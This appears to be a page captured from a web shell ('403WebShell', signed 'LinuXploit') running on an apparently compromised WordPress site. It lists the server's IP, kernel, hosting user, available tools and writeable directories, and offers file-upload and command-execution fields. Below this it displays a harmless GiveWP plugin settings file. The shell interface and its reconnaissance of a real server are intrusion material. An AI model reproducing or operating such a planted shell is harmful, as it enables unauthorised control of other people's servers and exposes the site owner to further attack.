Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/blueversion/wp-content/plugins/give/src/BetaFeatures/Actions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/blueversion/wp-content/plugins/give/src/BetaFeatures/Actions/RegisterSettings.php
<?php

namespace Give\BetaFeatures\Actions;

use Give\BetaFeatures\Facades\FeatureFlag;

/**
 * @since 3.6.0
 */
class RegisterSettings
{
    public function __invoke($settings)
    {
        if('beta' !== give_get_current_setting_section()) {
            return $settings;
        }

        FeatureFlag::resetNotificationCount();

        return $this->getSettings();
    }

    protected function getSettings()
    {
        return [
            ['id' => 'give_title_beta_features_1', 'type' => 'title'],
            ['id' => 'give_beta_features_banner', 'type' => 'beta_features'],
            [
                'name' => __('Event Tickets', 'give'),
                'desc' => __(
                    'If enabled, you’ll be get access to the event tickets feature where you can create events and sell tickets on your donation forms. Since this is in a beta, your feedback is crucial to help us improve and make the experience better before making it public.',
                    'give'
                ),
                'id' => 'enable_event_tickets',
                'type' => 'radio_inline',
                'default' => 'disabled',
                'options' => [
                    'enabled' => __('Enabled', 'give'),
                    'disabled' => __('Disabled', 'give'),
                ],
            ],
            ['id' => 'give_title_beta_features_2', 'type' => 'sectionend'],
            ['id' => 'give_beta_features_feedback_link', 'type' => 'beta_features_feedback_link'],
        ];
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit